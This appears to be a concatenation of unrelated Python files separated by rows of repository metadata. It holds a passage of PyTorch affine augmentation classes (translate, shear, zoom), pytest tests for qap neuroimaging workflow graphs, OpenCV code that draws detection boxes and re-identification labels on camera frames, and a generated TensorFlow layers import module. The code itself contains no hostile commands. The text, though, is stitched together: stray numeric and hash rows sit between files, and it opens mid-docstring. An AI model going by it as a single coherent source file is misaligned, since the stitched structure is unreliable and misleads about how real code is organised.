                fractional bounds of total width to shift image;
                image will be shifted between
                (-width_range * width_dimension, width_range * width_dimension)

        interp : string in {'bilinear', 'nearest'} or list of strings
            type of interpolation to use. You can provide a different
            type of interpolation for each input, e.g. if you have two
            inputs then you can say `interp=['bilinear','nearest']`

        lazy : boolean
            if true, only create the affine transform matrix and return that;
            if false, perform the transform on the tensor(s) and return them
        """
        if isinstance(translation_range, float):
            translation_range = (translation_range, translation_range)
        self.height_range = translation_range[0]
        self.width_range = translation_range[1]
        self.interp = interp
        self.lazy = lazy

    def __call__(self, *inputs):
        # sample the vertical and horizontal shifts independently
        shift = [random.uniform(-self.height_range, self.height_range),
                 random.uniform(-self.width_range, self.width_range)]
        if self.lazy:
            return Translate(shift, lazy=True)(inputs[0])
        return Translate(shift, interp=self.interp)(*inputs)
class RandomChoiceTranslate(object):

    def __init__(self,
                 values,
                 p=None,
                 interp='bilinear',
                 lazy=False):
        """
        Translate an image by a height/width fraction sampled from a list
        of candidate values. If the image has multiple channels, the same
        translation is applied to each channel.

        Arguments
        ---------
        values : a list or tuple
            the values from which the translation value will be sampled

        p : a list or tuple the same length as `values`
            the probabilities of sampling any given value. Must sum to 1.

        interp : string in {'bilinear', 'nearest'} or list of strings
            type of interpolation to use. You can provide a different
            type of interpolation for each input, e.g. if you have two
            inputs then you can say `interp=['bilinear','nearest']`

        lazy : boolean
            if true, only create the affine transform matrix and return that;
            if false, perform the transform on the tensor(s) and return them
        """
        if isinstance(values, (list, tuple)):
            values = th.FloatTensor(values)
        self.values = values
        if p is None:
            # default to a uniform distribution over the candidates
            p = th.ones(len(values)) / len(values)
        elif abs(1.0 - sum(p)) > 1e-3:
            raise ValueError('Probs must sum to 1')
        self.p = p
        self.interp = interp
        self.lazy = lazy

    def __call__(self, *inputs):
        # sample the height and width shifts independently
        shift = [th_random_choice(self.values, p=self.p),
                 th_random_choice(self.values, p=self.p)]
        if self.lazy:
            return Translate(shift, lazy=True)(inputs[0])
        return Translate(shift, interp=self.interp)(*inputs)
class Translate(object):

    def __init__(self,
                 value,
                 interp='bilinear',
                 lazy=False):
        """
        Translate an image by a fixed fraction of its height and/or width.

        Arguments
        ---------
        value : float or 2-tuple of float
            if single value, both horizontal and vertical translation
            will be this value * total height/width. Thus, value should
            be a fraction of total height/width with range (-1, 1)

        interp : string in {'bilinear', 'nearest'} or list of strings
            type of interpolation to use. You can provide a different
            type of interpolation for each input, e.g. if you have two
            inputs then you can say `interp=['bilinear','nearest']`

        lazy : boolean
            if true, only create the affine transform matrix and return that
            if false, perform the transform on the tensor and return the tensor
        """
        if not isinstance(value, (tuple, list)):
            value = (value, value)
        if value[0] > 1 or value[0] < -1:
            raise ValueError('Translation must be between -1 and 1')
        if value[1] > 1 or value[1] < -1:
            raise ValueError('Translation must be between -1 and 1')
        self.height_range = value[0]
        self.width_range = value[1]
        self.interp = interp
        self.lazy = lazy

    def __call__(self, *inputs):
        # broadcast a single interpolation mode to every input
        if not isinstance(self.interp, (tuple, list)):
            interp = [self.interp] * len(inputs)
        else:
            interp = self.interp

        # pixel offsets from fractional ranges; dim 1 is treated as height
        # and dim 2 as width for a (C, H, W) tensor
        tx = self.height_range * inputs[0].size(1)
        ty = self.width_range * inputs[0].size(2)
        translation_matrix = th.FloatTensor([[1, 0, tx],
                                             [0, 1, ty],
                                             [0, 0, 1]])
        if self.lazy:
            return translation_matrix
        else:
            outputs = []
            for idx, _input in enumerate(inputs):
                input_tf = th_affine2d(_input,
                                       translation_matrix,
                                       mode=interp[idx],
                                       center=True)
                outputs.append(input_tf)
            # BUGFIX: was `idx > 1`, which silently dropped the second output
            # when exactly two inputs were given
            return outputs if len(outputs) > 1 else outputs[0]
class RandomShear(object):

    def __init__(self,
                 shear_range,
                 interp='bilinear',
                 lazy=False):
        """
        Shear an image by an angle drawn uniformly at random from
        (-shear_range, shear_range). The value is passed to `Shear`,
        which converts it from degrees to radians.

        Arguments
        ---------
        shear_range : float
            bounds on the shear angle

        interp : string in {'bilinear', 'nearest'} or list of strings
            type of interpolation to use. You can provide a different
            type of interpolation for each input, e.g. if you have two
            inputs then you can say `interp=['bilinear','nearest']`

        lazy : boolean
            if false, perform the transform on the tensor(s) and return them;
            if true, only create the affine transform matrix and return that
        """
        self.shear_range = shear_range
        self.interp = interp
        self.lazy = lazy

    def __call__(self, *inputs):
        angle = random.uniform(-self.shear_range, self.shear_range)
        if self.lazy:
            return Shear(angle, lazy=True)(inputs[0])
        return Shear(angle, interp=self.interp)(*inputs)
class RandomChoiceShear(object):

    def __init__(self,
                 values,
                 p=None,
                 interp='bilinear',
                 lazy=False):
        """
        Shear an image with an angle sampled from a list of candidate values.

        Arguments
        ---------
        values : a list or tuple
            the values from which the shear value will be sampled

        p : a list or tuple the same length as `values`
            the probabilities of sampling any given value. Must sum to 1.

        interp : string in {'bilinear', 'nearest'} or list of strings
            type of interpolation to use. You can provide a different
            type of interpolation for each input, e.g. if you have two
            inputs then you can say `interp=['bilinear','nearest']`

        lazy : boolean
            if false, perform the transform on the tensor(s) and return them;
            if true, only create the affine transform matrix and return that
        """
        if isinstance(values, (list, tuple)):
            values = th.FloatTensor(values)
        self.values = values
        if p is None:
            # default to a uniform distribution over the candidates
            p = th.ones(len(values)) / len(values)
        elif abs(1.0 - sum(p)) > 1e-3:
            raise ValueError('Probs must sum to 1')
        self.p = p
        self.interp = interp
        self.lazy = lazy

    def __call__(self, *inputs):
        chosen_angle = th_random_choice(self.values, p=self.p)
        if self.lazy:
            return Shear(chosen_angle, lazy=True)(inputs[0])
        return Shear(chosen_angle, interp=self.interp)(*inputs)
class Shear(object):

    def __init__(self,
                 value,
                 interp='bilinear',
                 lazy=False):
        """
        Shear an image by a fixed angle.

        Arguments
        ---------
        value : integer or float
            shear angle in degrees (converted to radians internally)

        interp : string in {'bilinear', 'nearest'} or list of strings
            type of interpolation to use. You can provide a different
            type of interpolation for each input, e.g. if you have two
            inputs then you can say `interp=['bilinear','nearest']`

        lazy : boolean
            if true, only create the affine transform matrix and return that
            if false, perform the transform on the tensor and return the tensor
        """
        self.value = value
        self.interp = interp
        self.lazy = lazy

    def __call__(self, *inputs):
        # broadcast a single interpolation mode to every input
        if not isinstance(self.interp, (tuple, list)):
            interp = [self.interp] * len(inputs)
        else:
            interp = self.interp

        # degrees -> radians, then build the 3x3 homogeneous shear matrix
        theta = (math.pi * self.value) / 180
        shear_matrix = th.FloatTensor([[1, -math.sin(theta), 0],
                                       [0, math.cos(theta), 0],
                                       [0, 0, 1]])
        if self.lazy:
            return shear_matrix
        else:
            outputs = []
            for idx, _input in enumerate(inputs):
                input_tf = th_affine2d(_input,
                                       shear_matrix,
                                       mode=interp[idx],
                                       center=True)
                outputs.append(input_tf)
            # BUGFIX: was `idx > 1`, which silently dropped the second output
            # when exactly two inputs were given
            return outputs if len(outputs) > 1 else outputs[0]
class RandomZoom(object):

    def __init__(self,
                 zoom_range,
                 interp='bilinear',
                 lazy=False):
        """
        Randomly zoom in and/or out on an image

        Arguments
        ---------
        zoom_range : tuple or list with 2 values, both between (0, infinity)
            lower and upper bounds on percent zoom.
            Anything less than 1.0 will zoom in on the image,
            anything greater than 1.0 will zoom out on the image.
            e.g. (0.7, 1.0) will only zoom in,
                 (1.0, 1.4) will only zoom out,
                 (0.7, 1.4) will randomly zoom in or out

        interp : string in {'bilinear', 'nearest'} or list of strings
            type of interpolation to use. You can provide a different
            type of interpolation for each input, e.g. if you have two
            inputs then you can say `interp=['bilinear','nearest']`

        lazy : boolean
            if false, perform the transform on the tensor and return the tensor
            if true, only create the affine transform matrix and return that
        """
        # BUGFIX: also validate the length — the error message always promised
        # "2 values" but only the container type was checked before
        if not isinstance(zoom_range, (list, tuple)) or len(zoom_range) != 2:
            raise ValueError('zoom_range must be tuple or list with 2 values')
        self.zoom_range = zoom_range
        self.interp = interp
        self.lazy = lazy

    def __call__(self, *inputs):
        # sample the two zoom factors independently
        zx = random.uniform(self.zoom_range[0], self.zoom_range[1])
        zy = random.uniform(self.zoom_range[0], self.zoom_range[1])
        if self.lazy:
            return Zoom([zx, zy], lazy=True)(inputs[0])
        else:
            outputs = Zoom([zx, zy],
                           interp=self.interp)(*inputs)
            return outputs
class RandomChoiceZoom(object):

    def __init__(self,
                 values,
                 p=None,
                 interp='bilinear',
                 lazy=False):
        """
        Zoom in and/or out on an image with a factor sampled from a list
        of candidate values.

        Arguments
        ---------
        values : a list or tuple
            the values from which the applied zoom value will be sampled

        p : a list or tuple the same length as `values`
            the probabilities of sampling any given value. Must sum to 1.

        interp : string in {'bilinear', 'nearest'} or list of strings
            type of interpolation to use. You can provide a different
            type of interpolation for each input, e.g. if you have two
            inputs then you can say `interp=['bilinear','nearest']`

        lazy : boolean
            if false, perform the transform on the tensor(s) and return them;
            if true, only create the affine transform matrix and return that
        """
        if isinstance(values, (list, tuple)):
            values = th.FloatTensor(values)
        self.values = values
        if p is None:
            # default to a uniform distribution over the candidates
            p = th.ones(len(values)) / len(values)
        elif abs(1.0 - sum(p)) > 1e-3:
            raise ValueError('Probs must sum to 1')
        self.p = p
        self.interp = interp
        self.lazy = lazy

    def __call__(self, *inputs):
        # sample the two zoom factors independently
        factors = [th_random_choice(self.values, p=self.p),
                   th_random_choice(self.values, p=self.p)]
        if self.lazy:
            return Zoom(factors, lazy=True)(inputs[0])
        return Zoom(factors, interp=self.interp)(*inputs)
class Zoom(object):

    def __init__(self,
                 value,
                 interp='bilinear',
                 lazy=False):
        """
        Zoom in and/or out on an image by a fixed factor.

        Arguments
        ---------
        value : float or 2-tuple of floats
            Fractional zoom (one factor per axis when a tuple is given).
                =1 : no zoom
                >1 : zoom-in (value-1)%
                <1 : zoom-out (1-value)%

        interp : string in {'bilinear', 'nearest'} or list of strings
            type of interpolation to use. You can provide a different
            type of interpolation for each input, e.g. if you have two
            inputs then you can say `interp=['bilinear','nearest']`

        lazy : boolean
            if true, only create the affine transform matrix and return that
            if false, perform the transform on the tensor and return the tensor
        """
        if not isinstance(value, (tuple, list)):
            value = (value, value)
        self.value = value
        self.interp = interp
        self.lazy = lazy

    def __call__(self, *inputs):
        # broadcast a single interpolation mode to every input
        if not isinstance(self.interp, (tuple, list)):
            interp = [self.interp] * len(inputs)
        else:
            interp = self.interp

        zx, zy = self.value
        zoom_matrix = th.FloatTensor([[zx, 0, 0],
                                      [0, zy, 0],
                                      [0, 0, 1]])
        if self.lazy:
            return zoom_matrix
        else:
            outputs = []
            for idx, _input in enumerate(inputs):
                input_tf = th_affine2d(_input,
                                       zoom_matrix,
                                       mode=interp[idx],
                                       center=True)
                outputs.append(input_tf)
            # BUGFIX: was `idx > 1`, which silently dropped the second output
            # when exactly two inputs were given
            return outputs if len(outputs) > 1 else outputs[0]
| 35.19401
| 83
| 0.548041
| 3,126
| 27,029
| 4.646193
| 0.071657
| 0.028918
| 0.036629
| 0.017557
| 0.804186
| 0.793721
| 0.769141
| 0.762875
| 0.756472
| 0.741394
| 0
| 0.009963
| 0.372452
| 27,029
| 767
| 84
| 35.239896
| 0.846304
| 0.385475
| 0
| 0.75
| 0
| 0
| 0.02428
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.078947
| false
| 0
| 0.010526
| 0
| 0.202632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8a39029e1c41bb53bfbeaf78210abb20677c45fd
| 5,125
|
py
|
Python
|
qap/test_qap_workflows.py
|
manwithadodla/quality-assessment-protocol
|
9f4d660bd67eb20d4b4a28ae7e837e6d396f0318
|
[
"BSD-3-Clause"
] | 38
|
2015-01-23T20:07:22.000Z
|
2021-11-08T07:08:27.000Z
|
qap/test_qap_workflows.py
|
manwithadodla/quality-assessment-protocol
|
9f4d660bd67eb20d4b4a28ae7e837e6d396f0318
|
[
"BSD-3-Clause"
] | 107
|
2015-01-09T00:34:34.000Z
|
2022-02-28T07:44:10.000Z
|
qap/test_qap_workflows.py
|
manwithadodla/quality-assessment-protocol
|
9f4d660bd67eb20d4b4a28ae7e837e6d396f0318
|
[
"BSD-3-Clause"
] | 24
|
2015-09-14T16:11:12.000Z
|
2021-10-04T08:09:16.000Z
|
import pytest
test_sub_dir = "test_data"
@pytest.mark.quick
def test_run_everything_qap_anatomical_spatial_workflow_graph():
    # This tests the workflow builder, not the end results (these have their
    # own unit tests): build the workflow without running it, dump its
    # dependency graph, and compare it line-by-line to a stored reference.
    import os
    import shutil
    import pkg_resources as p

    from qap.qap_workflows import run_everything_qap_anatomical_spatial

    anatomical_scan = p.resource_filename(
        "qap", os.path.join(test_sub_dir, "anatomical_scan.nii.gz"))
    template_head = p.resource_filename(
        "qap", os.path.join(test_sub_dir, "MNI152_T1_3mm.nii.gz"))
    ref_graph = p.resource_filename(
        "qap", os.path.join(test_sub_dir, "anatomical_spatial_graph.dot"))

    out_dir = os.path.join(os.getcwd(), "unit_tests_qap_workflows")
    out_workflow = run_everything_qap_anatomical_spatial(anatomical_scan,
                                                         template_head,
                                                         "participant_1",
                                                         out_dir=out_dir,
                                                         run=False)
    out_workflow_obj = out_workflow[0]
    out_workflow_dir = out_workflow[1]

    # write the dependency graph of the workflow we are testing
    out_graph = os.path.join(out_workflow_dir, "graph.dot")
    out_workflow_obj.write_graph(dotfilename=out_graph, simple_form=False)

    # load both the reference and the to-test dependency graphs;
    # `with` guarantees the handles are closed even if reading fails
    with open(ref_graph, "r") as f:
        ref_graph_lines = sorted(f.readlines())
    with open(out_graph, "r") as f:
        out_graph_lines = sorted(f.readlines())

    # best-effort cleanup. BUGFIX: was a bare `except: pass`, which also
    # swallowed KeyboardInterrupt/SystemExit; ignore_errors only suppresses
    # removal errors.
    shutil.rmtree(out_dir, ignore_errors=True)

    assert ref_graph_lines == out_graph_lines
@pytest.mark.quick
def test_run_everything_qap_functional_spatial_workflow_graph():
    # This tests the workflow builder, not the end results (these have their
    # own unit tests): build the workflow without running it, dump its
    # dependency graph, and compare it line-by-line to a stored reference.
    import os
    import shutil
    import pkg_resources as p

    from qap.qap_workflows import run_everything_qap_functional_spatial

    functional_scan = p.resource_filename(
        "qap", os.path.join(test_sub_dir, "functional_scan.nii.gz"))
    ref_graph = p.resource_filename(
        "qap", os.path.join(test_sub_dir, "functional_spatial_graph.dot"))

    out_dir = os.path.join(os.getcwd(), "unit_tests_qap_workflows")
    out_workflow = run_everything_qap_functional_spatial(functional_scan,
                                                         "participant_1",
                                                         out_dir=out_dir,
                                                         run=False)
    out_workflow_obj = out_workflow[0]
    out_workflow_dir = out_workflow[1]

    # write the dependency graph of the workflow we are testing
    out_graph = os.path.join(out_workflow_dir, "graph.dot")
    out_workflow_obj.write_graph(dotfilename=out_graph, simple_form=False)

    # load both the reference and the to-test dependency graphs;
    # `with` guarantees the handles are closed even if reading fails
    with open(ref_graph, "r") as f:
        ref_graph_lines = sorted(f.readlines())
    with open(out_graph, "r") as f:
        out_graph_lines = sorted(f.readlines())

    # best-effort cleanup. BUGFIX: was a bare `except: pass`, which also
    # swallowed KeyboardInterrupt/SystemExit; ignore_errors only suppresses
    # removal errors.
    shutil.rmtree(out_dir, ignore_errors=True)

    assert ref_graph_lines == out_graph_lines
@pytest.mark.quick
def test_run_everything_qap_functional_temporal_workflow_graph():
    # This tests the workflow builder, not the end results (these have their
    # own unit tests): build the workflow without running it, dump its
    # dependency graph, and compare it line-by-line to a stored reference.
    # NOTE: removed the unused `numpy` and `nibabel` imports.
    import os
    import shutil
    import pkg_resources as p

    from qap.qap_workflows import run_everything_qap_functional_temporal

    functional_scan = p.resource_filename(
        "qap", os.path.join(test_sub_dir, "functional_scan.nii.gz"))
    ref_graph = p.resource_filename(
        "qap", os.path.join(test_sub_dir, "functional_temporal_graph.dot"))

    out_dir = os.path.join(os.getcwd(), "unit_tests_qap_workflows")
    out_workflow = run_everything_qap_functional_temporal(functional_scan,
                                                          "participant_1",
                                                          out_dir=out_dir,
                                                          run=False)
    out_workflow_obj = out_workflow[0]
    out_workflow_dir = out_workflow[1]

    # write the dependency graph of the workflow we are testing
    out_graph = os.path.join(out_workflow_dir, "graph.dot")
    out_workflow_obj.write_graph(dotfilename=out_graph, simple_form=False)

    # load both the reference and the to-test dependency graphs;
    # `with` guarantees the handles are closed even if reading fails
    with open(ref_graph, "r") as f:
        ref_graph_lines = sorted(f.readlines())
    with open(out_graph, "r") as f:
        out_graph_lines = sorted(f.readlines())

    # best-effort cleanup. BUGFIX: was a bare `except: pass`, which also
    # swallowed KeyboardInterrupt/SystemExit; ignore_errors only suppresses
    # removal errors.
    shutil.rmtree(out_dir, ignore_errors=True)

    assert ref_graph_lines == out_graph_lines
| 33.940397
| 77
| 0.609366
| 634
| 5,125
| 4.616719
| 0.141956
| 0.07892
| 0.044414
| 0.047831
| 0.963102
| 0.956953
| 0.956953
| 0.926888
| 0.913905
| 0.913905
| 0
| 0.003984
| 0.314341
| 5,125
| 150
| 78
| 34.166667
| 0.82897
| 0.120976
| 0
| 0.769231
| 0
| 0
| 0.07682
| 0.049655
| 0
| 0
| 0
| 0
| 0.032967
| 1
| 0.032967
| false
| 0.032967
| 0.164835
| 0
| 0.197802
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8a3e908ee0789e5e64a8a1ead4991a875b71f7a9
| 7,871
|
py
|
Python
|
Source/LoadImagePrintText.py
|
Farious/PersonTracker
|
0ce45211e8e00cc573c60a6cd00d46bbddaa2256
|
[
"Apache-2.0"
] | 1
|
2017-11-13T12:41:58.000Z
|
2017-11-13T12:41:58.000Z
|
Source/LoadImagePrintText.py
|
Farious/PersonTracker
|
0ce45211e8e00cc573c60a6cd00d46bbddaa2256
|
[
"Apache-2.0"
] | null | null | null |
Source/LoadImagePrintText.py
|
Farious/PersonTracker
|
0ce45211e8e00cc573c60a6cd00d46bbddaa2256
|
[
"Apache-2.0"
] | null | null | null |
import cv2
def loadImagePrintTextBKP(cam, frame, debugREID=1, showPD=1, debugPD=0, PDthreshold=-1):
    """
    Load a camera frame from disk and draw person-detection boxes plus
    re-identification labels onto it.

    :param cam: camera id; camera 60 uses a doubled font scale
    :param frame: frame number used to build the image/detection filenames
    :param debugREID: if 0, re-ID labels are drawn in black instead of
        green (correct match) / red (incorrect match)
    :param showPD: if 0, return the raw image without drawing anything
    :param debugPD: if nonzero, also draw the detection confidence value
    :param PDthreshold: confidence threshold below which drawing stops
    :return: the (possibly annotated) image, or None if the file is missing
    """
    ## Pre-defined static variables
    CV_FILLED = -1
    red = (0, 0, 255)
    green = (0, 255, 0)
    black = (0, 0, 0)
    white = (255, 255, 255)
    thickness = 8
    if cam == 60:
        fontScale = 2  # 2 for Camera 60 (4MPixel), 1 for other cameras (1MPixel)
    else:
        fontScale = 1
    textHeight = 25 * fontScale  # 50 for cv2.FONT_HERSHEY_DUPLEX in cam60 image sizes
    letterWidth = 18 * fontScale
    smalltextHeight = 16 * fontScale  # 50 for cv2.FONT_HERSHEY_DUPLEX in cam60 image sizes
    smallletterWidth = 13 * fontScale

    # doubled backslashes keep the same path strings while avoiding the
    # invalid escape sequences (e.g. "\J", "\D") of the original literals
    JPEGspath = "RESOURCES\\JPEG\\camera" + str(cam) + "\\"
    filename = "I" + str(frame).zfill(5) + ".jpeg"
    image = cv2.imread(JPEGspath + filename)
    if showPD == 0:  # Don't print anything in image, just return the RAW
        return image

    detectionsPath = ".\\RESOURCES\\Detections\\camera" + str(cam) + "\\"
    detectionFile = "I" + str(frame).zfill(5) + ".txt"
    # BUGFIX: use a context manager so the file handle is always closed
    with open(detectionsPath + detectionFile, 'r') as fileText:
        lines = fileText.readlines()

    res1 = [line.rstrip('\n').split(',') for line in lines]
    for i, values in enumerate(res1):
        res1[i] = [float(value) for value in values]
        left = int(res1[i][0])
        top = int(res1[i][1])
        right = left + int(res1[i][2])
        bottom = top + int(res1[i][3])
        confidence = res1[i][4]
        # NOTE(review): this returns immediately, skipping any remaining
        # detections — presumably relies on detections being sorted by
        # confidence; confirm against the detection-file writer
        if confidence < PDthreshold:  # Don't print anything, neither detection or RE-ID
            return image
        confidence = str(confidence)
        ## Coordinate frame is (x,y) starting at top-left corner
        ## cv2.rectangle(img, pt1, pt2, color[, thickness[, lineType[, shift]]])
        cv2.rectangle(image, (left, top), (right, bottom), red, thickness)
        if debugPD:
            cv2.rectangle(image, (left, bottom),
                          (left + smallletterWidth * len(confidence), bottom + smalltextHeight + fontScale), white,
                          CV_FILLED)
            # BUGFIX: OpenCV requires an int thickness; `thickness / 2` is a
            # float in Python 3
            cv2.putText(image, confidence, (left, bottom + smalltextHeight), cv2.FONT_HERSHEY_COMPLEX_SMALL, fontScale,
                        color=black, thickness=thickness // 2)
        if len(res1[i]) > 5:  # There is a re-IDentification for this detection
            correctID = int(res1[i][5])
            REIDs = [int(value) for value in res1[i][6:]]
            ## Given a list of names, put one white box for each, on top of the
            ## image, and print the text on each respective whitebox.
            # Standard person names are PersonXXX
            texts = [str(k + 1) + ".Person" + str(ID).zfill(3) for k, ID in enumerate(REIDs)]
            # But for a few select persons that we do know their first name,
            # we can re-name the text to their names
            for k, ID in enumerate(REIDs):
                if ID == 22:
                    texts[k] = str(k + 1) + ".Matteo"
                if ID == 32:
                    texts[k] = str(k + 1) + ".Dario"
            for k, ID in enumerate(REIDs):
                text = texts[k]
                j = k
                # in thickness CV_FILLED is -1
                # +fontScale to give a little white margin on the bottom
                cv2.rectangle(image, (left, top - textHeight * j + fontScale),
                              (left + letterWidth * len(text), top - textHeight * (j + 1)), white, CV_FILLED)
                if ID == correctID:
                    color = green
                else:
                    color = red
                if debugREID == 0:
                    color = black
                # BUGFIX: int thickness (see above)
                cv2.putText(image, text, (left, top - textHeight * j), cv2.FONT_HERSHEY_DUPLEX, fontScale, color,
                            thickness=thickness // 2)
    # BUGFIX: the function previously fell off the end and returned None
    # after annotating; return the annotated image like loadImagePrintText
    return image
def loadImagePrintText(cam, frame, id_list=None, debugREID=1, showPD=1, debugPD=0, PDthreshold=-1):
    """
    Load a camera frame from disk and draw person-detection boxes plus
    re-identification labels onto it.

    :param cam: camera id; camera 60 uses a doubled font scale
    :param frame: frame number used to build the image/detection filenames
    :param id_list: currently unused (kept for interface compatibility);
        BUGFIX: default changed from the mutable `[]` to None
    :param debugREID: if 0, re-ID labels are drawn in black instead of
        green (correct match) / red (incorrect match)
    :param showPD: if 0, return the raw image without drawing anything
    :param debugPD: if nonzero, also draw the detection confidence value
    :param PDthreshold: confidence threshold below which drawing stops
    :return: the (possibly annotated) image, or None if the file is missing
    """
    if id_list is None:
        id_list = []
    ## Pre-defined static variables
    CV_FILLED = -1
    red = (0, 0, 255)
    green = (0, 255, 0)
    black = (0, 0, 0)
    white = (255, 255, 255)
    thickness = 8
    if cam == 60:
        fontScale = 2  # 2 for Camera 60 (4MPixel), 1 for other cameras (1MPixel)
    else:
        fontScale = 1
    textHeight = 25 * fontScale  # 50 for cv2.FONT_HERSHEY_DUPLEX in cam60 image sizes
    letterWidth = 18 * fontScale
    smalltextHeight = 16 * fontScale  # 50 for cv2.FONT_HERSHEY_DUPLEX in cam60 image sizes
    smallletterWidth = 13 * fontScale

    # BUGFIX: the previous code referenced undefined names (`join`,
    # `self.videos_dir`, `JPEGspath`, `filename`) and raised NameError;
    # restored the path construction used by loadImagePrintTextBKP
    JPEGspath = "RESOURCES\\JPEG\\camera" + str(cam) + "\\"
    filename = "I" + str(frame).zfill(5) + ".jpeg"
    image = cv2.imread(JPEGspath + filename)
    if showPD == 0:  # Don't print anything in image, just return the RAW
        return image

    detectionsPath = ".\\RESOURCES\\Detections\\camera" + str(cam) + "\\"
    detectionFile = "I" + str(frame).zfill(5) + ".txt"
    # BUGFIX: use a context manager so the file handle is always closed
    with open(detectionsPath + detectionFile, 'r') as fileText:
        lines = fileText.readlines()

    res1 = [line.rstrip('\n').split(',') for line in lines]
    for i, values in enumerate(res1):
        res1[i] = [float(value) for value in values]
        left = int(res1[i][0])
        top = int(res1[i][1])
        right = left + int(res1[i][2])
        bottom = top + int(res1[i][3])
        confidence = res1[i][4]
        # NOTE(review): this returns immediately, skipping any remaining
        # detections — presumably relies on detections being sorted by
        # confidence; confirm against the detection-file writer
        if confidence < PDthreshold:  # Don't print anything, neither detection or RE-ID
            return image
        confidence = str(confidence)
        ## Coordinate frame is (x,y) starting at top-left corner
        ## cv2.rectangle(img, pt1, pt2, color[, thickness[, lineType[, shift]]])
        cv2.rectangle(image, (left, top), (right, bottom), red, thickness)
        if debugPD:
            cv2.rectangle(image, (left, bottom),
                          (left + smallletterWidth * len(confidence), bottom + smalltextHeight + fontScale), white,
                          CV_FILLED)
            # BUGFIX: OpenCV requires an int thickness; `thickness / 2` is a
            # float in Python 3
            cv2.putText(image, confidence, (left, bottom + smalltextHeight), cv2.FONT_HERSHEY_COMPLEX_SMALL, fontScale,
                        color=black, thickness=thickness // 2)
        if len(res1[i]) > 5:  # There is a re-IDentification for this detection
            correctID = int(res1[i][5])
            REIDs = [int(value) for value in res1[i][6:]]
            ## Given a list of names, put one white box for each, on top of the
            ## image, and print the text on each respective whitebox.
            # Standard person names are PersonXXX
            texts = [str(k + 1) + ".Person" + str(ID).zfill(3) for k, ID in enumerate(REIDs)]
            # But for a few select persons that we do know their first name,
            # we can re-name the text to their names
            for k, ID in enumerate(REIDs):
                if ID == 22:
                    texts[k] = str(k + 1) + ".Matteo"
                if ID == 32:
                    texts[k] = str(k + 1) + ".Dario"
            for k, ID in enumerate(REIDs):
                text = texts[k]
                j = k
                # in thickness CV_FILLED is -1
                # +fontScale to give a little white margin on the bottom
                cv2.rectangle(image, (left, top - textHeight * j + fontScale),
                              (left + letterWidth * len(text), top - textHeight * (j + 1)), white, CV_FILLED)
                if ID == correctID:
                    color = green
                else:
                    color = red
                if debugREID == 0:
                    color = black
                # BUGFIX: int thickness (see above)
                cv2.putText(image, text, (left, top - textHeight * j), cv2.FONT_HERSHEY_DUPLEX, fontScale, color,
                            thickness=thickness // 2)
    return image
| 39.954315
| 124
| 0.553932
| 966
| 7,871
| 4.483437
| 0.188406
| 0.02078
| 0.018471
| 0.027707
| 0.962595
| 0.959132
| 0.959132
| 0.959132
| 0.959132
| 0.959132
| 0
| 0.038931
| 0.334265
| 7,871
| 196
| 125
| 40.158163
| 0.787595
| 0.228688
| 0
| 0.954198
| 0
| 0
| 0.025744
| 0.013206
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015267
| false
| 0
| 0.007634
| 0
| 0.061069
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8a45314eb8ea61a2853d2e7065e3c984d7b3411e
| 2,440
|
py
|
Python
|
python3/lib/python3.6/site-packages/tensorflow/_api/v1/compat/v1/layers/__init__.py
|
TruongThuyLiem/keras2tensorflow
|
726f2370160701081cb43fbd8b56154c10d7ad63
|
[
"MIT"
] | 3
|
2020-10-12T15:47:01.000Z
|
2022-01-14T19:51:26.000Z
|
python3/lib/python3.6/site-packages/tensorflow/_api/v1/compat/v1/layers/__init__.py
|
TruongThuyLiem/keras2tensorflow
|
726f2370160701081cb43fbd8b56154c10d7ad63
|
[
"MIT"
] | null | null | null |
python3/lib/python3.6/site-packages/tensorflow/_api/v1/compat/v1/layers/__init__.py
|
TruongThuyLiem/keras2tensorflow
|
726f2370160701081cb43fbd8b56154c10d7ad63
|
[
"MIT"
] | 2
|
2020-08-03T13:02:06.000Z
|
2020-11-04T03:15:44.000Z
|
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Public API for tf.layers namespace.
"""
from __future__ import print_function as _print_function
from tensorflow._api.v1.compat.v1.layers import experimental
from tensorflow.python.keras.engine import InputSpec
from tensorflow.python.layers.base import Layer
from tensorflow.python.layers.convolutional import Conv1D
from tensorflow.python.layers.convolutional import Conv2D
from tensorflow.python.layers.convolutional import Conv2DTranspose
from tensorflow.python.layers.convolutional import Conv3D
from tensorflow.python.layers.convolutional import Conv3DTranspose
from tensorflow.python.layers.convolutional import SeparableConv1D
from tensorflow.python.layers.convolutional import SeparableConv2D
from tensorflow.python.layers.convolutional import conv1d
from tensorflow.python.layers.convolutional import conv2d
from tensorflow.python.layers.convolutional import conv2d_transpose
from tensorflow.python.layers.convolutional import conv3d
from tensorflow.python.layers.convolutional import conv3d_transpose
from tensorflow.python.layers.convolutional import separable_conv1d
from tensorflow.python.layers.convolutional import separable_conv2d
from tensorflow.python.layers.core import Dense
from tensorflow.python.layers.core import Dropout
from tensorflow.python.layers.core import Flatten
from tensorflow.python.layers.core import dense
from tensorflow.python.layers.core import dropout
from tensorflow.python.layers.core import flatten
from tensorflow.python.layers.layers import AveragePooling1D
from tensorflow.python.layers.layers import AveragePooling2D
from tensorflow.python.layers.layers import AveragePooling3D
from tensorflow.python.layers.layers import BatchNormalization
from tensorflow.python.layers.layers import MaxPooling1D
from tensorflow.python.layers.layers import MaxPooling2D
from tensorflow.python.layers.layers import MaxPooling3D
